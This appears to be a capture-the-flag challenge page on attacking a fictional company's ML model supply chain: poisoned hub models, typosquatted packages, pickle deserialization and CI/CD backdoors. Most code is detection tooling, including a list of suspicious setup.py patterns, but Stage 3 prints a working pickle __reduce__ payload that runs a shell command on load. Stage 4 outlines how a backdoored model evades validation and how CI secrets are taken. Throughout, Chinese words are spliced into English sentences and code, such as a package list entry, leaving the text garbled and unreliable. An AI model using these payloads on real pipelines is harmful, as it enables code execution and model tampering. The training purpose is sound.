CTF: Supply Chain Saboteur
Identify and exploit supply chain vulnerabilities in a model deployment pipeline. Find poisoned models, exploit malicious packages, and compromise the ML infrastructure.
Challenge Briefing
HelixCorp is deploying a new ML model pipeline. Your objective is to compromise this pipeline at multiple points in the 供應鏈 -- from model 訓練資料 through deployment to production. Each stage of the pipeline has 漏洞 that mirror real-world 供應鏈 attacks documented in industry incident reports.
Pipeline Architecture
┌─────────────┐ ┌──────────────┐ ┌───────────────┐ ┌──────────────┐
│ Model Hub │───▶│ Training │───▶│ Model │───▶│ Production │
│ (Registry) │ │ Pipeline │ │ Registry │ │ Deployment │
│ │ │ │ │ (Internal) │ │ │
│ Stage 1 │ │ Stage 2 │ │ Stage 3 │ │ Stage 4 │
└─────────────┘ └──────────────┘ └───────────────┘ └──────────────┘
Objectives and Scoring
| Stage | Objective | Points |
|---|---|---|
| Stage 1 | 識別 a poisoned model on the public registry | 150 |
| Stage 2 | 利用 a malicious dependency in the 訓練 pipeline | 200 |
| Stage 3 | Achieve code execution via insecure model deserialization | 250 |
| Stage 4 | Compromise the production deployment through the CI/CD pipeline | 300 |
| Bonus | Document a complete attack chain from registry to production | +200 |
| Bonus | Detect and report all 漏洞 without 利用 | +100 |
Maximum possible score: 1,200 points
Stage 1: Poisoned Model 偵測
Scenario
HelixCorp downloads pre-trained models from a public model hub. One of the models available for download has been subtly poisoned -- it functions normally for most inputs but produces manipulated outputs for specific trigger inputs.
Challenge
Examine the available models and 識別 which one has been poisoned. Determine the trigger pattern and the nature of the poisoned behavior.
Model Inventory
List all models available for the target task on the registry. Note their upload dates, authors, download counts, and any quality metrics.
Provenance Analysis
Check the provenance of each model. Who uploaded it? Is there a verifiable 訓練 history? Do the 訓練 details match the claimed performance?
Behavioral 測試
Run each candidate model against a diverse 測試 set. Compare outputs between models to 識別 anomalies. Pay 注意力 to edge cases and unusual 輸入 patterns.
Trigger Hunting
If behavioral 測試 reveals anomalies, systematically search for the trigger pattern. 測試 with variations of the suspicious inputs to map the trigger's boundaries.
import hashlib
import json
import numpy as np
from pathlib import Path
def check_model_provenance(model_card: dict) -> list[str]:
"""Check a model card for 供應鏈 risk indicators."""
warnings = []
# Check author verification
if not model_card.get("author_verified", False):
warnings.append("WARN: Author identity not verified")
# Check 訓練資料 documentation
if "training_data" not in model_card:
warnings.append("WARN: No 訓練資料 documentation")
# Check for suspiciously recent upload with high download count
upload_age_days = model_card.get("age_days", 0)
downloads = model_card.get("downloads", 0)
if upload_age_days < 30 and downloads > 10000:
warnings.append(
f"WARN: {downloads} downloads in {upload_age_days} days "
"-- potential artificial inflation"
)
# Check model hash against known-good registry
if model_card.get("sha256") not in KNOWN_GOOD_HASHES:
warnings.append("WARN: Model hash not in known-good registry")
return warnings
def detect_backdoor_behavior(
model,
clean_inputs: list,
trigger_candidates: list,
threshold: float = 0.15,
) -> dict:
"""
Compare model behavior on clean vs. potentially triggered inputs.
A large divergence suggests 後門 behavior.
"""
clean_outputs = [model.predict(x) for x in clean_inputs]
results = {}
for trigger in trigger_candidates:
triggered_inputs = [inject_trigger(x, trigger) for x in clean_inputs]
triggered_outputs = [model.predict(x) for x in triggered_inputs]
# Measure behavioral divergence
divergence = compute_output_divergence(clean_outputs, triggered_outputs)
if divergence > threshold:
results[trigger] = {
"divergence": divergence,
"affected_samples": sum(
1 for c, t in zip(clean_outputs, triggered_outputs)
if c != t
),
}
return resultsHints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -22 pts | Check model upload dates -- the poisoned model was uploaded recently |
| Hint 2 | -37 pts | The trigger is a specific phrase embedded in the 輸入 text |
Stage 2: Malicious Dependency 利用
Scenario
The 訓練 pipeline uses a requirements.txt that pulls packages from PyPI. One of the dependencies has been typosquatted -- it has a name very similar to a legitimate package but contains malicious code that executes during installation.
Challenge
識別 the malicious dependency, analyze what it does, and demonstrate 利用.
Dependency Audit
Review the requirements file and compare each package name against the canonical PyPI registry. Look for misspellings, character substitutions, and namespace confusion.
Package Analysis
Download the suspicious package and inspect its setup.py, init.py, and any post-install hooks. Malicious packages often execute code during pip install.
Payload Analysis
Determine what the malicious code does. Common payloads include: reverse shells, credential theft, environment variable exfiltration, or 訓練資料 manipulation.
import difflib
from typing import Optional
# Known legitimate packages for ML pipelines
LEGITIMATE_PACKAGES = {
"torch", "torchvision", "transformers", "datasets",
"numpy", "scipy", "pandas", "scikit-learn",
"tokenizers", "accelerate", "safetensors",
"huggingface-hub", "評估", "peft",
}
def find_typosquats(
requirements: list[str],
known_packages: set[str] = LEGITIMATE_PACKAGES,
threshold: float = 0.85,
) -> list[dict]:
"""
識別 potential typosquatting in a requirements list.
Returns packages that are suspiciously similar to known packages.
"""
suspicious = []
for req in requirements:
pkg_name = req.split("==")[0].split(">=")[0].strip().lower()
if pkg_name in known_packages:
continue
# Check similarity against known packages
for legit in known_packages:
ratio = difflib.SequenceMatcher(None, pkg_name, legit).ratio()
if ratio >= threshold and pkg_name != legit:
suspicious.append({
"package": pkg_name,
"similar_to": legit,
"similarity": ratio,
"warning": f"Possible typosquat of '{legit}'",
})
return suspicious
def analyze_setup_py(setup_content: str) -> list[str]:
"""Check setup.py for suspicious patterns."""
red_flags = []
suspicious_patterns = [
("subprocess", "Executes system commands"),
("os.system", "Executes system commands"),
("socket", "Network communication"),
("requests.post", "Sends data to external server"),
("base64.b64decode", "Decoded obfuscated payload"),
("exec(", "Dynamic code execution"),
("eval(", "Dynamic code 評估"),
("__import__", "Dynamic module import"),
]
for pattern, description in suspicious_patterns:
if pattern in setup_content:
red_flags.append(f"RED FLAG: {description} ({pattern})")
return red_flagsHints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -30 pts | One package name differs from its legitimate counterpart by a single character |
| Hint 2 | -50 pts | Check the setup.py of each unfamiliar package for post-install hooks |
Stage 3: Insecure Deserialization
Scenario
HelixCorp's internal model registry stores models in Python's pickle format. A model artifact in the registry contains a payload that executes arbitrary code when deserialized.
Challenge
Craft a malicious model file that, when loaded by the deployment pipeline, executes a payload to extract the flag from the production environment.
import pickle
import os
class MaliciousModel:
"""
A class that executes arbitrary code when unpickled.
Demonstrates why pickle should never be used for
untrusted model files.
"""
def __reduce__(self):
# This method is called during deserialization
# It can execute arbitrary code
return (
os.system,
("cat /flag.txt > /tmp/exfiltrated.txt",)
)
def create_poisoned_model(output_path: str = "model.pkl"):
"""Create a model file that executes code on load."""
payload = MaliciousModel()
with open(output_path, "wb") as f:
pickle.dump(payload, f)
print(f"Poisoned model written to {output_path}")
def demonstrate_safe_alternative():
"""Show the safe alternative using safetensors."""
from safetensors.torch import save_file, load_file
import torch
# Safetensors only stores tensor data, no code execution
tensors = {"weight": torch.randn(10, 10)}
save_file(tensors, "model.safetensors")
loaded = load_file("model.safetensors") # Safe -- no code runsFor a deeper treatment of pickle-based exploits, see pickle exploits.
Hints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -37 pts | The pipeline calls torch.load() without setting weights_only=True |
| Hint 2 | -62 pts | Use reduce to inject a system command into the pickle payload |
Stage 4: CI/CD Pipeline Compromise
Scenario
The final stage targets the CI/CD pipeline that deploys models to production. The pipeline pulls models from the internal registry, runs validation tests, and deploys to the production endpoint. 存在 a 漏洞 in the validation step.
Challenge
利用 the CI/CD pipeline to deploy a model that contains a 後門, bypassing the validation tests.
Approach
- Analyze the CI/CD configuration for injection points
- 識別 what the validation tests check and what they miss
- Craft a model that passes validation but contains a 後門 for specific trigger inputs
- 利用 any secrets or credentials accessible from within the CI/CD environment
Hints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -45 pts | The validation tests only check accuracy on a fixed 測試 set |
| Hint 2 | -75 pts | A backdoored model that performs normally on the 測試 set but has a trigger will pass validation |
Related Challenges
- 代理 Heist -- 代理-level 利用
- RAG Infiltrator -- data pipeline 投毒
- Model Supply Chain -- theoretical foundations
相關主題
- Fine-Tune 後門 - 後門 injection through 微調 that complements 供應鏈 attacks
- Federated Poisoning - Distributed 訓練 投毒 in the broader 供應鏈 surface
- Training Data Extraction - Training pipeline attacks related to 供應鏈 compromise
- Model Supply Chain - Theoretical foundations for model 供應鏈 安全
參考文獻
- "Poisoning Language Models During Instruction Tuning" - Wan et al. (2023) - Research on 後門 injection through 訓練 資料投毒
- "BadNets: Identifying 漏洞 in the Machine Learning Model Supply Chain" - Gu et al. (2019) - Foundational research on ML 供應鏈 後門 attacks
- "OWASP Top 10 for LLM Applications: Supply Chain 漏洞" - OWASP (2025) - Industry guidance on ML 供應鏈 安全
- "Spinning Sequence-to-Sequence Models with Meta-Backdoors" - Bagdasaryan & Shmatikov (2022) - Advanced 供應鏈 後門 techniques for sequence models
Why is Python's pickle format a 安全 risk for model serialization?
What makes typosquatting attacks particularly effective against ML teams?